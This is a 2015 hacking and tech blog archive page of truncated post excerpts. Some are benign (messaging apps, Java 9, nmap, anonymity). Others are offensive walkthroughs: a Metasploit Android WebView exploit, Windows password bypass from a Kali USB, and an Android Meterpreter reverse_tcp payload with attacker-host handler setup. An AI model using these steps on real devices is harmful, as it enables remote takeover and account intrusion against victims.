Posts

Showing posts from November, 2015
Image
TOP ANDROID &  IOS APP TO SEND & RECEIVE ENCRYPTED TEXT MESSAGES SECURE MESSAGING APP 1. TextSecure and Signal Unique feature: Message everyone in your phone list, even if they don’t use TextSecure. Security: Uses independently developed algorithms, including those implementing forward secrecy in which a new key is generated for each message. Open Source. TextSecure, created by former Twitter security researcher Moxie Marlinspike’s Open Whisper Systems, is the only app we looked at that can be used to message anyone in your existing phone list, even to the point where it’s a seamless replacement for the default text messaging client. Bear in mind, though, that end-to-end encryption will only exist in conversations with other TextSecure users, though you'll be informed when a conversation is insecure. Some of the options to increase security include scanning encryption keys in-person with contacts to prevent man-in-the-middle attacks
Image
HACKER USING YOUR OWN IP ADDRESS TO HACK YOU Your IP ( I nternet P rotocol) address is your unique ID on the internet. It’s synonymous with your home address. Anyone in the world can contact your computer through its IP address, and send a retrieve information with it. I’m sure at one time or another you’ve heard that hackers can hack your computer via your IP address. This is one of the reasons proxies and anonymity services exist, to protect people from learning your IP address. So how are hackers using just an address to get into your computer and make your life hell? Open ports. Your computer runs services like media sharing on what are called ports . A port is just an opening that a service uses as a communications endpoint. There are 65,535 total allocated ports in TCP/UDP . To exploit a service on a port, a hacker would  banner grab for the software and version. After they learn that information, they would search sites like Packet Storm for known exploits to ru
JAVA 9 RELEASE DATE AND ITS NEW FEATURES Java 9 release dates and roadmap is finalized by Oracle and you can expect it to be available by Sep 22nd, 2016. If you are interested in trying it out now, the early access version of JDK 9 is available  here . The milestone definitions for JDK9 are the same as those for JDK 8 . Modularity via Project Jigsaw is a key feature of Java 9. Java 9 will treat modules as a fundamental new kind of program component, with the system improving scalability and performance, a key Oracle Java official says. In  a blog post this week , Oracle’s Mark Reinhold, chief architect of the Java platform group, discussed the goals of the module system. Chief among them is reliable configuration, to replace the “brittle, error-prone, class-path mechanism” with a means for program components to declare dependencies on each other. Strong encapsulation, which allows a component to declare which public types are accessible to other components, is also a
Image
HACKING ANDROID MOBILE (NEW TUTORIAL)---70 % DEVICES VULNERABLE Around 70% of all Android devices in the field are subject to a Javascript exploit that could allow an attacker remote access to your phone by doing nothing more than surfing to a malicious page or scanning in a malicious QR Code. Called the “Android WebView addJavascriptInterface Vulnerability”, it works when untrusted Javascript code is executed by a WebView on Android devices. And here is the kicker, about 70% of Android devices (phones and tablets) are vulnerable to it! This month Rapid7 added the exploit as a Metasploit Module , so let’s take a look at it using Kali Linux and Metasploit: 1. Run Metasploit from the Kali Menu, or type “msfconsole” at a terminal prompt. 2. Type, “use exploit /android/browser/webview_addjavascriptinterface”. 3. Then type, “show options” to see what needs to be set: For the most part, you are good to go. You can turn on SSL if you want, change the port or host add
Image
BLOG IN LESS THAN 10 MINUTE BY RUBY ON RAILS ---- VIDEO TUTORIAL source: geekboy.co
Image
CRACKING WINDOWS PASSWORD USING KALI LINUX Hi there Geeks..! Today I’m gonna show you how to hack and reset a Windows password using a KALI LINUX live USB or CD. There are many ways by which you can reset a Windows password like by using Softwares like KON-BOOT ,  Ophcrack  and some other techniques. Generally, in Windows, Password files and Usernames are stored in SAM files. So, I’m just gonna get started : First of all, you need to download Kali Linux ISO file and make a bootable USB drive. You can download the ISO file  here . And to create a Bootable KALI LINUX USB, you can use Universal USB installer from  here. Okay now plug in your Bootable USB drive and make sure you change the boot priority to USB, and fire up KALI LIVE(forensic mode). If prompted, default Username is toor and password if root. Now open up terminal and type: cd /media/ ls (here you’ll have your drive no. or partition no., copy this) now type : cd “paste your partition no. here”/Wi
Image
HOW SQL INJECTION WORK ??  -- GRAPHICS DEMONSTRATION SQL injection attacks are one of the most common forms of cyber attacks. These attacks are very effective and about 32% of all Web applications are vulnerable to SQL injections. SQL is a technique of code injection that is used to attack data-driven applications. Here, malicious SQL statements are inserted into any entry field for execution. If you are not using the best practices, the notorious attackers can target your website to deploy SQL injection attacks and play with the sensitive data. Also read:  Understand Python in 15 Minutes About 27% of all the web attacks are SQL injection attacks and the average cost of minor SQL injection attack is about $196,000. We are sharing an infographic prepared by Barricade detailing different aspects of an SQL injection attack. Take a look to know more on how an SQL injection attack works:    source: geekboy.co, barricade.io
Image
WHAT IS DARKNET AND HOW IT WORKS ?? What a tangled web we weave, indeed. About 40 percent of the world’s population uses the Web for news, entertainment, communication and myriad other purposes [source: Internet World Stats ]. Yet even as more and more people log on, they are actually finding less of the data that’s stored online. That’s because only a sliver of what we know as the World Wide Web is easily accessible. The so-called surface Web , which all of us use routinely, consists of data that search engines can find and then offer up in response to your queries. But in the same way that only the tip of an iceberg is visible to observers, a traditional search engine sees only a small amount of the information that’s available — a measly 0.03 percent. [source: OEDB ] What’s Dark Web ? The Dark Web is a term that refers specifically to a collection of websites that are publicly visible, but hide the IP addresses of the servers that run them. Thus they can be
Image
TOP N-MAP COMMAND FOR SYS/NETWORK ADMINS ABOUT N-MAP Nmap (“Network Mapper”) is an open source tool for network exploration and security auditing. It was designed to rapidly scan large networks, although it works fine against single hosts. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. While Nmap is commonly used for security audits, many systems and network administrators find it useful for routine tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime. N-MAP ANSWERS THE FOLLOWING QUESTION EASILY  What computers did you find running on the local network? What IP addresses did you find running on the local network? What is the operating system of your tar
Image
HACKING ANY ANDROID SMART PHONE USING META EXPLOIT --- KALI LINUX 2.0 source: hacking-tutorial.com Step by Step Hacking Android Smartphone Tutorial using Metasploit: 1. Open terminal (CTRL + ALT + T) view tutorial how to create linux keyboard shortcut . 2. We will utilize Metasploit payload framework to create exploit for this tutorial. msfpayload android/meterpreter/reverse_tcp LHOST=<attacker_ip_address> LPORT=<port_to_receive_connection> As described above that attacker IP address is 192.168.8.94, below is our screenshot when executed the command 3. Because our payload is reverse_tcp where attacker expect the victim to connect back to attacker machine, attacker needs to set up the handler to handle incoming connections to the port already specified above. Type msfconsole to go to Metasploit console. Info: use exploit /multi/handler –> we will use Metasploit handler set payload android/meterpreter/reverse_tcp –> make sure the payload
Image
BEING ANONYMOUS ONLINE ALWAYS Concerns about internet privacy are no longer just the realm of child pornographers, terrorists, and hackers: a compromised internet identity makes you a prime target for identity theft, and other illegal activity. Some people are also worried about staying safe from their own governments (and reasonably so!). If you want to keep yourself safe in this digital age, you can do so by taking some basic precautions which serve to hide or disguise your identity. Ad Steps Understanding Anonymity Basics 1 Edit step 1 Websites track visitors to serve ads and link to social media. Every time you visit a website, it will log your IP address (your computer's "address" on the internet), what site you're coming from, the browser you are using, your operating system, how long you spend on the site, and what links you click. Ad 2 Edit step 2 Major search engines store your search history. Your search engine